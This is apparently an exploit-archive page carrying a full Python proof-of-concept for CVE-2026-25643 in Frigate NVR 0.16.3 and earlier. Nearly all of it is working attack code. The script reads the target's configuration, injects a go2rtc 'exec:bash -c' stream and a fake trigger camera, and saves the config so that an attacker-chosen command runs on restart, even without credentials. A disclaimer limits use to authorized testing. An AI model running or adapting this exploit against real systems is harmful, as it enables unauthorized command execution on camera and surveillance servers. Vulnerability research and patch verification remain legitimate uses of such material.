5465 Total CVEs
26 Years
GitHub
README.md
Rendering markdown...
POC / CVE-2026-25643.py PY
#!/usr/bin/env python3
"""
Frigate NVR ≤ 0.16.3 Blind RCE Exploit
CVE-2026-25643

This Python exploit targets a critical configuration manipulation vulnerability 
in Frigate NVR versions up to 0.16.3 (both authenticated and unauthenticated paths). 
By injecting a malicious go2rtc stream and a fake camera entry, 
it triggers arbitrary command execution as the Frigate process during service restart — 
no reverse shell or output capture required.

Author:          Joshua van der poll (https://github.com/joshuavanderpoll)
Created:         February 2026
Version:         1.0
License:         GNU General Public License v3.0 (GPL-3.0)
Disclaimer:      Use responsibly. This is a proof-of-concept for a patched
                 vulnerability (fixed in Frigate ≥ 0.16.4). Do not use against
                 systems you do not own or have explicit permission to test.

Credits / References:
- jduardo2704/CVE-2026-25643-Frigate-RCE

Usage:
    python3 exploit.py -u http://target:5000 -c "touch /tmp/pwned"
    python3 exploit.py -u https://target -U admin -P password -c "id > /tmp/id.txt"

"""

import requests
import argparse
import sys
import json
import urllib3
import yaml
import time

# Disable SSL warnings
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Colors
GREEN  = '\033[92m'
YELLOW = '\033[93m'
RED    = '\033[91m'
BLUE   = '\033[94m'
CYAN   = '\033[96m'
RESET  = '\033[0m'

def print_status(msg, color=BLUE, symbol="[*]"):
    print(f"{color}{symbol} {msg}{RESET}")

def print_success(msg):
    print_status(msg, GREEN, "[+]")

def print_warning(msg):
    print_status(msg, YELLOW, "[!]")

def print_error(msg, exc=None):
    print_status(msg, RED, "[-]")
    if exc:
        print(f"    → {type(exc).__name__}: {exc}")
        import traceback
        traceback.print_exc(limit=2)

def login_frigate(session, base_url, username, password):
    print_status(f"Trying to authenticate as '{username}' ...")
    try:
        resp = session.post(
            f"{base_url}/api/login",
            json={"user": username, "password": password},
            verify=False,
            timeout=12
        )
        print_status(f"Login → status code: {resp.status_code}", CYAN)
        
        if resp.status_code == 200:
            print_success("Login successful")
            return True
        else:
            print_warning(f"Login failed - status: {resp.status_code}")
            if resp.text.strip():
                print(f"    Response: {resp.text[:180].strip()}")
            return False
            
    except Exception as e:
        print_error("Login request failed", e)
        return False

def fetch_config(session, base_url):
    print_status("Fetching current configuration (/api/config/raw) ...")
    try:
        resp = session.get(f"{base_url}/api/config/raw", timeout=12, verify=False)
        print_status(f"Config fetch → HTTP {resp.status_code}", CYAN)
        
        if resp.status_code != 200:
            print_error(f"Cannot read config - status {resp.status_code}")
            if resp.text.strip():
                print(f"    Body preview: {resp.text[:200]}")
            return None

        content = resp.text.strip()
        print_status(f"Received {len(content)} bytes", CYAN)

        # Handle possible JSON string wrapping or direct YAML
        if content.startswith('"') and content.endswith('"'):
            try:
                content = json.loads(content)
                print_status("Config was JSON-wrapped → unwrapped", CYAN)
            except:
                pass

        try:
            config = yaml.safe_load(content)
            if not isinstance(config, dict):
                print_error("Parsed config is not a dictionary")
                return None
            print_success(f"Config parsed successfully ({len(config)} top-level keys)")
            return config
        except yaml.YAMLError as e:
            print_error("YAML parsing failed", e)
            print(f"    Raw content preview: {content[:300]}")
            return None

    except Exception as e:
        print_error("Failed to fetch/parse configuration", e)
        return None

def send_config(session, base_url, config_data, save_option="restart"):
    yaml_payload = yaml.dump(config_data, allow_unicode=True, sort_keys=False)
    bytes_size = len(yaml_payload.encode())
    
    print_status(f"Sending modified config ({bytes_size:,} bytes) with option: {save_option}")
    
    try:
        resp = session.post(
            f"{base_url}/api/config/save?save_option={save_option}",
            data=yaml_payload,
            headers={"Content-Type": "text/plain"},
            timeout=10,
            verify=False
        )
        print_status(f"Config save → HTTP {resp.status_code}", CYAN)
        
        if resp.status_code in (200, 204):
            print_success("Configuration accepted (server should restart)")
        else:
            print_warning(f"Config rejected - status {resp.status_code}")
            if resp.text.strip():
                print(f"    Server response: {resp.text[:300].strip()}")
                
    except requests.Timeout:
        print_warning("Request timed out - server might be restarting already")
    except Exception as e:
        print_error("Failed to send modified configuration", e)

def inject_command_into_config(config, command):
    print_status(f"Preparing payload → executing: {command}")
    
    payload = f"bash -c '{command}'"
    print_status(f"Using payload: {payload}", CYAN)

    # go2rtc → streams
    if 'go2rtc' not in config:
        config['go2rtc'] = {}
    if 'streams' not in config['go2rtc']:
        config['go2rtc']['streams'] = {}

    config['go2rtc']['streams']['debug_cmd'] = [f"exec:{payload}"]
    print_success("Injected malicious stream → debug_cmd")

    # Fake camera to trigger execution
    if 'cameras' not in config:
        config['cameras'] = {}

    config['cameras']['trigger_exec'] = {
        'ffmpeg': {
            'inputs': [{
                'path': 'rtsp://127.0.0.1:8554/debug_cmd',
                'roles': ['detect']
            }]
        },
        'detect': {'enabled': False},
        'audio':  {'enabled': False},
        'enabled': True
    }
    print_success("Injected trigger camera → trigger_exec")

    return config

def exploit_command(base_url, username, password, command):
    session = requests.Session()
    session.verify = False

    # Authentication
    if username and password:
        login_frigate(session, base_url, username, password)
    else:
        print_warning("No credentials provided → attempting unauthenticated access")

    # Get current config
    config = fetch_config(session, base_url)
    if not config:
        print_error("Exploit aborted - cannot continue without valid config")
        sys.exit(1)

    # Modify config with our command
    try:
        modified_config = inject_command_into_config(config, command)
    except Exception as e:
        print_error("Failed to prepare malicious config", e)
        sys.exit(1)

    # Small delay
    time.sleep(1.2)
    
    # Send modified config
    send_config(session, base_url, modified_config)

    print("\n" + "="*60)
    print(f" {GREEN}Payload sent! Command should execute during go2rtc init / camera probe.{RESET}")
    print(" Keep in mind:")
    print(" • Output is NOT captured (blind execution)")
    print(" • Command runs as the user/frigate process")
    print(" • Multiple executions may occur during restart")
    print("="*60 + "\n")

def main():
    parser = argparse.ArgumentParser(
        description="Frigate <= 0.16.3 RCE – execute blind command (CVE-2026-25643)"
    )
    parser.add_argument('-u', '--url',      required=True,  help="Target URL (http(s)://host:port)")
    parser.add_argument('-U', '--username', required=False, help="Username (optional)")
    parser.add_argument('-P', '--password', required=False, help="Password (optional)")
    parser.add_argument('-c', '--cmd',      required=True,  help="Command to execute on target")

    args = parser.parse_args()

    base_url = args.url.rstrip('/')
    print(f"\n {BLUE}Target :{RESET} {base_url}")
    if args.username:
        print(f" {BLUE}User   :{RESET} {args.username}")
    print(f" {BLUE}Command:{RESET} {args.cmd}\n")

    try:
        exploit_command(
            base_url=base_url,
            username=args.username,
            password=args.password,
            command=args.cmd
        )
    except KeyboardInterrupt:
        print_warning("Interrupted by user")
        sys.exit(2)
    except Exception as e:
        print_error("Unexpected fatal error", e)
        sys.exit(3)

if __name__ == "__main__":
    main()